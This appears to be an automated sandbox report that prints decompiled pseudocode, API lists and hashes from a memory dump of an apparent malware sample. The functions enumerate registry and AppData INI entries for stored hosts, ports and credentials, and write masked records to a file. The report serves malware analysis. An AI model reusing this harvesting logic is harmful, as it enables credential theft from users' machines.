    						_t203 = E00414384(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
    						__eflags = _t203;
    						if(_t203 != 0) {
    							goto L48;
    						}
    						goto L16;
    					}
    					goto L55;
    				}
    				return 0;
    			}
    0x004143f7
    0x004143fa
    0x00414400
    0x00414417
    0x0041441c
    0x00414420
    0x00414424
    0x00414426
    0x00414429
    0x0041442b
    0x0041478e
    0x00414791
    0x00414798
    0x0041479b
    0x00000000
    0x0041479d
    0x00414431
    0x00414434
    0x00414437
    0x00000000
    0x00000000
    0x0041443f
    0x00414443
    0x00414457
    0x00414457
    0x00414459
    0x0041445c
    0x0041445f
    0x0041445f
    0x00414463
    0x00414466
    0x00000000
    0x00000000
    0x0041446c
    0x00414470
    0x00414473
    0x00000000
    0x00000000
    0x00414479
    0x0041447d
    0x00000000
    0x00000000
    0x00414483
    0x00414487
    0x00000000
    0x00000000
    0x0041448d
    0x00414491
    0x00000000
    0x00000000
    0x00414497
    0x0041449b
    0x00000000
    0x00000000
    0x004144a1
    0x004144a5
    0x00000000
    0x00000000
    0x004144ab
    0x004144b6
    0x004144b9
    0x004144bc
    0x004144c0
    0x00414718
    0x0041471c
    0x0041471e
    0x00414721
    0x00414724
    0x00000000
    0x00000000
    0x0041472c
    0x0041472f
    0x00000000
    0x00000000
    0x00414731
    0x00000000
    0x00414731
    0x004144c9
    0x004144ce
    0x004144d3
    0x004144d5
    0x00000000
    0x00000000
    0x004144db
    0x004144de
    0x004144e0
    0x004144f9
    0x004144f9
    0x004144fd
    0x00414500
    0x00414518
    0x00414518
    0x0041451c
    0x0041451f
    0x00414537
    0x00414537
    0x0041453a
    0x0041461e
    0x00414626
    0x0041462e
    0x00414638
    0x00414642
    0x00414645
    0x00414649
    0x0041464c
    0x00414654
    0x0041465e
    0x0041464e
    0x0041464e
    0x0041464e
    0x00414661
    0x00414665
    0x00414668
    0x00414670
    0x0041467a
    0x0041466a
    0x0041466a
    0x0041466a
    0x0041467d
    0x00414681
    0x00414684
    0x0041468c
    0x00414696
    0x00414686
    0x00414686
    0x00414686
    0x00414699
    0x0041469c
    0x0041469e
    0x0041473f
    0x00414744
    0x0041474e
    0x00414753
    0x00414756
    0x00414758
    0x00414762
    0x00414767
    0x0041475a
    0x0041475a
    0x0041475a
    0x00000000
    0x004146a4
    0x004146a4
    0x004146a6
    0x00414710
    0x00414715
    0x00414715
    0x00000000
    0x00414715
    0x004146bb
    0x004146bd
    0x004146c0
    0x004146c2
    0x0041476c
    0x0041476d
    0x00414775
    0x00414780
    0x00414785
    0x0041478a
    0x0041478a
    0x0041478a
    0x00000000
    0x0041478a
    0x004146cd
    0x004146d2
    0x004146d4
    0x00000000
    0x00000000
    0x004146e4
    0x004146e9
    0x004146eb
    0x00000000
    0x00000000
    0x004146fc
    0x00414706
    0x00000000
    0x00414706
    0x0041469e
    0x00414540
    0x00414545
    0x00000000
    0x00000000
    0x0041455a
    0x00414570
    0x00414575
    0x00414577
    0x00000000
    0x00000000
    0x0041457d
    0x00414583
    0x00414583
    0x00414585
    0x00414589
    0x0041458e
    0x0041458f
    0x00414592
    0x00414592
    0x00414597
    0x0041459d
    0x004145a0
    0x004145b8
    0x004145bb
    0x004145be
    0x004145c4
    0x004145c6
    0x00000000
    0x00000000
    0x004145de
    0x004145e4
    0x004145e6
    0x004145eb
    0x004145eb
    0x004145f1
    0x004145f7
    0x004145fa
    0x00414600
    0x0041460a
    0x0041460e
    0x00000000
    0x00000000
    0x00414614
    0x00414618
    0x00000000
    0x00000000
    0x00414618
    0x00000000
    0x004145fa
    0x00414524
    0x0041452a
    0x0041452f
    0x00414531
    0x00000000
    0x00000000
    0x00000000
    0x00414531
    0x00414505
    0x0041450b
    0x00414510
    0x00414512
    0x00000000
    0x00000000
    0x00000000
    0x00414512
    0x004144ec
    0x004144f1
    0x004144f3
    0x00000000
    0x00000000
    0x00000000
    0x004144f3
    0x00000000
    0x0041445f
    0x00000000

    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 549c8fd7c8845962dd7e0c6614f4eb6eb566c626bd0a5ccfaa853051ac47b783
    • Instruction ID: 5e39f14e75ecc2cf47a29b0b4bfa95de390f6d41d3a746493c8dd36469c36768
    • Opcode Fuzzy Hash: 549c8fd7c8845962dd7e0c6614f4eb6eb566c626bd0a5ccfaa853051ac47b783
    • Instruction Fuzzy Hash: 23B1B170900219ABDB20EF95C881BFEB7B4BF45714F40441AF961E7691E778E9C1CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040BDFD(char* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				int _v20;
    				int _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v68;
    				char _v88;
    				char _v108;
    				char _v132;
    				char _v172;
    				short _v260;
    				short _v780;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t65;
    				intOrPtr _t92;
    				int _t104;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				int _t120;
    				void* _t125;
    				void* _t132;
    				void* _t135;
    				void* _t136;
    
    				_t119 = __edx;
    				_t118 = __ecx;
    				_t120 = 0;
    				E0041645B( &_v32,  &_v32, 0, 8);
    				_t65 = E00416378(0xc1c);
    				_v16 = _t65;
    				if(_t65 == 0) {
    					L22:
    					if(_v28 <= _t120) {
    						return E004163A8(_v32);
    					}
    					return E004099E1(_t119, _v32, 0xcb);
    				} else {
    					_v36 = _t65 + 0x3fc;
    					_v48 = 0x80000001;
    					_v44 = 0x80000002;
    					E0040FA33(0x8a,  &_v260);
    					E0040FA33(0x8b,  &_v88);
    					E0040FA33(0x8c,  &_v132);
    					E0040FA33(0x8d,  &_v68);
    					E0040FA33(0x8e,  &_v108);
    					_v12 = 0;
    					do {
    						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
    							goto L20;
    						}
    						_v24 = _t120;
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
    							L19:
    							RegCloseKey(_v8);
    							goto L20;
    						} else {
    							goto L4;
    						}
    						L17:
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
    							L4:
    							_t122 = _v16;
    							_v24 = _v24 + 1;
    							_t92 = E0041A4CC(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
    							_v40 = _t92;
    							if(_t92 != 0xffffffff && _t92 != 0) {
    								_t132 = E0041A4CC(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
    								if(_t132 != 0xffffffff && _t132 != 0) {
    									_t124 = _v36;
    									_t104 = E0041A4CC(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
    									_v20 = _t104;
    									if(_t104 != 0xffffffff && _t104 != 0 && E0040BD43(_t119, _t124, _t132 + _v40) > 0) {
    										_t125 = E0041A582(_v8, _t118,  &_v780,  &_v132);
    										if(_t125 < 1 || _t125 > 0xffff) {
    											_t125 = 0x15;
    										}
    										_t134 =  &_v172;
    										_t110 = 0x55;
    										E0040FA33(_t110,  &_v172);
    										_t112 = _v16;
    										_t118 = _v36;
    										_push(_t125);
    										_push(_t112);
    										_push(_t118);
    										_push(_t112 + 0x1fe);
    										_t119 = 0x311;
    										_t126 = _t118 + 0x1fe;
    										_t115 = E0041709B(_t134, 0x311, _t118 + 0x1fe, _t134);
    										_t136 = _t136 + 0x14;
    										if(_t115 > 0) {
    											_t118 =  &_v32;
    											if(E0041679C(_t115,  &_v32, _t126) != 0) {
    												_v28 = _v28 + 1;
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							_t120 = 0;
    							goto L19;
    						}
    						L20:
    						_v12 = _v12 + 1;
    					} while (_v12 < 2);
    					E004163A8(_v16);
    					goto L22;
    				}
    			}

    0x0040bdfd
    0x0040bdfd
    0x0040be0b
    0x0040be12
    0x0040be1c
    0x0040be21
    0x0040be26
    0x0040c01f
    0x0040c022
    0x00000000
    0x0040c03b
    0x00000000
    0x0040be2c
    0x0040be31
    0x0040be3f
    0x0040be46
    0x0040be4d
    0x0040be5a
    0x0040be67
    0x0040be74
    0x0040be81
    0x0040be86
    0x0040be8e
    0x0040beab
    0x00000000
    0x00000000
    0x0040bec4
    0x0040bec7
    0x0040bed6
    0x0040c001
    0x0040c004
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040bfd3
    0x0040bfe7
    0x0040bff9
    0x0040bedc
    0x0040bedc
    0x0040bedf
    0x0040bef1
    0x0040bef6
    0x0040befc
    0x0040bf24
    0x0040bf29
    0x0040bf37
    0x0040bf49
    0x0040bf4e
    0x0040bf54
    0x0040bf7a
    0x0040bf7f
    0x0040bf8b
    0x0040bf8b
    0x0040bf8e
    0x0040bf94
    0x0040bf95
    0x0040bf9a
    0x0040bf9d
    0x0040bfa0
    0x0040bfa1
    0x0040bfa2
    0x0040bfa8
    0x0040bfac
    0x0040bfb1
    0x0040bfb7
    0x0040bfbc
    0x0040bfc1
    0x0040bfc4
    0x0040bfce
    0x0040bfd0
    0x0040bfd0
    0x0040bfce
    0x0040bfc1
    0x0040bf54
    0x0040bf29
    0x00000000
    0x0040bfff
    0x0040bfff
    0x00000000
    0x0040bfff
    0x0040c00a
    0x0040c00a
    0x0040c00d
    0x0040c01a
    0x00000000
    0x0040c01a

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040BEA3
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040BECE
    • RegCloseKey.ADVAPI32(?), ref: 0040C004
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040BFF1
      • Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562
      • Part of subcall function 0041A582: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00406E96,?,?), ref: 0041A59A
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: b9edb49341048ffdca3e764c04b29dfcab4fc4b415c2259f5ce213791859adc4
    • Instruction ID: 9db0dfbf60430dfd33d01ee4be052f3dc0f7ae82ddf8c9aa1bfb722658f3152f
    • Opcode Fuzzy Hash: b9edb49341048ffdca3e764c04b29dfcab4fc4b415c2259f5ce213791859adc4
    • Instruction Fuzzy Hash: 99517C72D00219ABDB10DBD5CC45AEFB7BCEB44304F100176F914F3291D7389A858BA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040C391(char* __ecx, void* __eflags) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				int* _v20;
    				intOrPtr _v24;
    				char _v28;
    				char* _v32;
    				char _v40;
    				char _v52;
    				char _v64;
    				char _v76;
    				char _v116;
    				short _v180;
    				short _v700;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t55;
    				int _t81;
    				int _t89;
    				int _t93;
    				void* _t99;
    				intOrPtr _t101;
    				void* _t104;
    				int* _t109;
    				char* _t113;
    				void* _t114;
    				void* _t122;
    
    				_t107 = __ecx;
    				_t109 = 0;
    				E0041645B( &_v28,  &_v28, 0, 8);
    				_t55 = E00416378(0xc1c);
    				_v16 = _t55;
    				if(_t55 == 0) {
    					return _t55;
    				}
    				_v32 = _t55 + 0x3fc;
    				E0040FA33(0x97,  &_v180);
    				E0040FA33(0x98,  &_v64);
    				E0040FA33(0x99,  &_v76);
    				E0040FA33(0x9a,  &_v52);
    				E0040FA33(0x9b,  &_v40);
    				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
    					L20:
    					E004163A8(_v16);
    					if(_v24 <= _t109) {
    						return E004163A8(_v28);
    					}
    					return E004099E1(0x311, _v28, 0xcb);
    				}
    				_v20 = 0;
    				_v12 = 0x104;
    				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
    					L19:
    					RegCloseKey(_v8);
    					goto L20;
    				} else {
    					do {
    						_t111 = _v16;
    						_v20 = _v20 + 1;
    						_t81 = E0041A4CC(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
    						_v12 = _t81;
    						if(_t81 != 0xffffffff && _t81 != 0) {
    							_t89 = E0041A4CC(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
    							_v12 = _t89;
    							if(_t89 != 0xffffffff && _t89 != 0) {
    								_t113 = _v32;
    								_t93 = E0041A4CC(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
    								_v12 = _t93;
    								if(_t93 != 0xffffffff && _t93 != 0) {
    									_t107 = _t113;
    									if(E00416EF7(_t113) > 0) {
    										_t114 = E0041A582(_v8, _t107,  &_v700,  &_v76);
    										if(_t114 < 1 || _t114 > 0xffff) {
    											_t114 = 0x15;
    										}
    										_t121 =  &_v116;
    										_t99 = 0x55;
    										E0040FA33(_t99,  &_v116);
    										_t101 = _v16;
    										_t107 = _v32;
    										_push(_t114);
    										_push(_t101);
    										_push(_t107);
    										_push(_t101 + 0x1fe);
    										_t115 = _t107 + 0x1fe;
    										_t104 = E0041709B(_t121, 0x311, _t107 + 0x1fe, _t121);
    										_t122 = _t122 + 0x14;
    										if(_t104 > 0) {
    											_t107 =  &_v28;
    											if(E0041679C(_t104,  &_v28, _t115) != 0) {
    												_v24 = _v24 + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_v12 = 0x104;
    					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
    					_t109 = 0;
    					goto L19;
    				}
    			}

    0x0040c391
    0x0040c39f
    0x0040c3a6
    0x0040c3b0
    0x0040c3b5
    0x0040c3ba
    0x0040c5b4
    0x0040c5b4
    0x0040c3c5
    0x0040c3d3
    0x0040c3e0
    0x0040c3ed
    0x0040c3fa
    0x0040c407
    0x0040c427
    0x0040c587
    0x0040c58a
    0x0040c592
    0x00000000
    0x0040c5ab
    0x00000000
    0x0040c5a1
    0x0040c440
    0x0040c443
    0x0040c452
    0x0040c57e
    0x0040c581
    0x00000000
    0x0040c458
    0x0040c45d
    0x0040c45d
    0x0040c460
    0x0040c472
    0x0040c477
    0x0040c47d
    0x0040c4a0
    0x0040c4a5
    0x0040c4ab
    0x0040c4b9
    0x0040c4cb
    0x0040c4d0
    0x0040c4d6
    0x0040c4dc
    0x0040c4e5
    0x0040c4fa
    0x0040c4ff
    0x0040c50b
    0x0040c50b
    0x0040c50e
    0x0040c511
    0x0040c512
    0x0040c517
    0x0040c51a
    0x0040c51d
    0x0040c51e
    0x0040c51f
    0x0040c525
    0x0040c52e
    0x0040c534
    0x0040c539
    0x0040c53e
    0x0040c541
    0x0040c54b
    0x0040c54d
    0x0040c54d
    0x0040c54b
    0x0040c53e
    0x0040c4e5
    0x0040c4d6
    0x0040c4ab
    0x0040c564
    0x0040c574
    0x0040c57c
    0x00000000
    0x0040c57c

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040C41F
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040C44A
    • RegCloseKey.ADVAPI32(?), ref: 0040C581
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040C56E
      • Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562
      • Part of subcall function 0041A582: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00406E96,?,?), ref: 0041A59A
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: ace445d2dded854746e8670399476770bb44f67fd2d11ae51dddb9b56113800f
    • Instruction ID: b735405ef8454f34d703f507aceed1cdfb7f1f4b518fd927111f8fa9b80eb64f
    • Opcode Fuzzy Hash: ace445d2dded854746e8670399476770bb44f67fd2d11ae51dddb9b56113800f
    • Instruction Fuzzy Hash: F5512276D00119BBDB10EBA5CD85AEFB7BCEF44304F100276B915F3291E734AA858B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004127E2(void* __eflags, intOrPtr _a4) {
    				signed int _v5;
    				short _v20;
    				char _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				short _v664;
    				char _v1184;
    				short _v1704;
    				char _v2224;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t31;
    				long _t33;
    				void* _t36;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				long _t50;
    				short* _t58;
    				char* _t65;
    				short _t66;
    				void* _t67;
    				WCHAR* _t70;
    				long _t77;
    
    				_t31 = 0x2a;
    				E0040FA33(_t31,  &_v144);
    				_t33 =  &_v1184;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
    				if(_t33 == 0) {
    					_t33 = E0041BC2F( &_v144,  &_v1184,  &_v1184);
    					if(_t33 != 0) {
    						_t36 = 0x2c;
    						E0040FA33(_t36,  &_v112);
    						_t33 = E0041BC2F( &_v112,  &_v1704,  &_v1184);
    						if(_t33 != 0) {
    							_t33 = GetFileAttributesW( &_v1704);
    							if(_t33 != 0xffffffff) {
    								_t42 = 0x2d;
    								E0040FA33(_t42,  &_v60);
    								_t44 = 0x2e;
    								E0040FA33(_t44,  &_v84);
    								_t46 = 0x2f;
    								E0040FA33(_t46,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_push(_v5 & 0x000000ff);
    									_push( &_v60);
    									_t67 = 0xa;
    									_t70 =  &_v40;
    									_t50 = E0041709B( &_v60, _t67, _t70);
    									if(_t50 < 1) {
    										break;
    									}
    									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
    									_t77 = _t50;
    									if(_t77 == 0xffffffff) {
    										break;
    									}
    									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
    									if(_t50 == 0) {
    										L17:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									_t58 =  &_v664;
    									if(_v664 == 0) {
    										L12:
    										if(_t77 != 1) {
    											_t65 =  &_v664;
    											L16:
    											_t50 = E00412969(0, _t65, _a4, _t90);
    											if(_t50 == 0) {
    												break;
    											}
    											goto L17;
    										}
    										_t50 = E0041BC2F( &_v664,  &_v2224,  &_v1184);
    										_t90 = _t50;
    										if(_t50 == 0) {
    											goto L17;
    										}
    										_t65 =  &_v2224;
    										goto L16;
    									} else {
    										goto L9;
    									}
    									do {
    										L9:
    										if( *_t58 == 0x2f) {
    											_t66 = 0x5c;
    											 *_t58 = _t66;
    										}
    										_t58 = _t58 + 2;
    									} while ( *_t58 != 0);
    									goto L12;
    								}
    								return _t50;
    							}
    						}
    					}
    				}
    				return _t33;
    			}

    0x004127f5
    0x004127f6
    0x004127fb
    0x00412809
    0x00412811
    0x00412821
    0x00412828
    0x00412833
    0x00412834
    0x00412849
    0x00412850
    0x0041285d
    0x00412866
    0x00412871
    0x00412872
    0x0041287c
    0x0041287d
    0x00412887
    0x00412888
    0x0041288d
    0x00412891
    0x00412895
    0x00412899
    0x0041289c
    0x0041289d
    0x004128a0
    0x004128aa
    0x00000000
    0x00000000
    0x004128c0
    0x004128c6
    0x004128cb
    0x00000000
    0x00000000
    0x004128ec
    0x004128f4
    0x00412955
    0x00412955
    0x0041295c
    0x00000000
    0x00000000
    0x00000000
    0x0041295c
    0x004128f6
    0x00412903
    0x00412919
    0x0041291c
    0x00412943
    0x00412949
    0x0041294c
    0x00412953
    0x00000000
    0x00000000
    0x00000000
    0x00412953
    0x00412932
    0x00412937
    0x00412939
    0x00000000
    0x00000000
    0x0041293b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00412905
    0x00412905
    0x00412909
    0x0041290d
    0x0041290e
    0x0041290e
    0x00412911
    0x00412914
    0x00000000
    0x00412905
    0x00000000
    0x00412962
    0x00412866
    0x00412850
    0x00412828
    0x00412966

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00412809
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041285D
    • GetPrivateProfileIntW.KERNEL32 ref: 004128C0
    • GetPrivateProfileStringW.KERNEL32 ref: 004128EC
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PathPrivateProfile$AttributesCombineFileFolderString
    • String ID:
    • API String ID: 1702184609-0
    • Opcode ID: 74714b4306295cb19873d9b916e12b1444ac21f756429fa9481bd38333695ab7
    • Instruction ID: 3087a919dfb70da80075aed87c75a41ef7ae3cf14a508dd3e6ebedaebcf8c4f1
    • Opcode Fuzzy Hash: 74714b4306295cb19873d9b916e12b1444ac21f756429fa9481bd38333695ab7
    • Instruction Fuzzy Hash: 0241B4B2A002186ADF20EBA4DD45EDF73BCAB05314F0005A7F608F7191D7B49F8A8B58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040A333,?,?), ref: 0041C863
    • VariantInit.OLEAUT32(?), ref: 0041C8AF
    • SysAllocString.OLEAUT32(?), ref: 0041C8BF
    • VariantClear.OLEAUT32(?), ref: 0041C8F8
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Variant$AllocClearCreateInitInstanceString
    • String ID:
    • API String ID: 3126708813-0
    • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction ID: dd0e7c70390be49303fea1791e94dfec46ed251a0cca32237a0152ea63f65da7
    • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction Fuzzy Hash: 3B217171940228AFCB10DBA4CCC8EEF7BBCEF09750F1005A5F906EB291D6759940CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C361(signed int __edx, void** __esi, void* _a4, signed int _a8) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t26;
    				signed int _t29;
    				signed int _t46;
    				void** _t48;
    
    				_t48 = __esi;
    				_t46 = __edx;
    				_v5 = 0;
    				if(_a8 <= 0xa00000) {
    					_t26 = E0041B6AE( *__esi);
    					_v36 = _t26;
    					_v32 = _t46;
    					if((_t26 & _t46) != 0xffffffff && E0041B68E( *__esi, 0, 0, 2) != 0) {
    						_t29 = E0041B6AE( *__esi);
    						_v28 = _t29;
    						_v24 = _t46;
    						if((_t29 & _t46) != 0xffffffff) {
    							E0041645B( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ _a8;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
    								E0041B68E( *_t48, _v28, _v24, 0);
    								SetEndOfFile( *_t48);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t48);
    						E0041B68E( *_t48, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    0x0041c361
    0x0041c361
    0x0041c372
    0x0041c375
    0x0041c37d
    0x0041c382
    0x0041c387
    0x0041c38d
    0x0041c3a8
    0x0041c3ad
    0x0041c3b2
    0x0041c3b8
    0x0041c3c1
    0x0041c3d3
    0x0041c3e6
    0x0041c418
    0x0041c41f
    0x0041c409
    0x0041c409
    0x0041c409
    0x0041c3e6
    0x0041c427
    0x0041c436
    0x0041c436
    0x0041c38d
    0x0041c441

    APIs
      • Part of subcall function 0041B6AE: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004051C6,?,?,?), ref: 0041B6C3
      • Part of subcall function 0041B68E: SetFilePointerEx.KERNEL32(?,?,?,00000000,?,0041C495,?,?,00000000,00000001,?,004051C6,?,?,?), ref: 0041B6A0
    • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C3E2
    • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041C3FB
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041C41F
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C427
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: 26814eebbb2ddee8fc7778f59fbab11eba2d74ef0c8da63d0415d118eb86ba68
    • Instruction ID: 86b21c03c2c4f513a1a12868d7b4eecc27ddc3b7b4e738ea07b5aef058b3814c
    • Opcode Fuzzy Hash: 26814eebbb2ddee8fc7778f59fbab11eba2d74ef0c8da63d0415d118eb86ba68
    • Instruction Fuzzy Hash: F331CE72844108FFDF119FA4CC81EEEBBB9FF08344F10852AF290A1161D73A8991DB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D1EE(void* __ebx, void* __ecx) {
    				char _v20;
    				char* _v84;
    				char _v92;
    				char _v196;
    				char _v716;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				char _t37;
    				void** _t43;
    
    				_t36 = __ecx;
    				_t35 = __ebx;
    				_t15 =  *(__ebx + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t2 = _t35 + 0x17c; // 0x17c
    					_t43 = _t2;
    					E00417DB7(_t43);
    					E0040F0DC(_t36,  &_v716, 1);
    					E0040ED80(0x2937498d,  &_v196, 0);
    					_t37 = 0x44;
    					E0041645B( &_v92,  &_v92, 0, _t37);
    					_v92 = _t37;
    					_v84 =  &_v196;
    					ResetEvent( *(_t35 + 0xc));
    					if(E00417C6F( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
    						E004163E4(_t43,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t43, 0);
    							E00417DB7(_t43);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t31 = 0;
    					}
    				} else {
    					L6:
    					_t31 = 1;
    				}
    				return _t31;
    			}

    0x0041d1ee
    0x0041d1ee
    0x0041d1f1
    0x0041d201
    0x0041d217
    0x0041d217
    0x0041d21d
    0x0041d22a
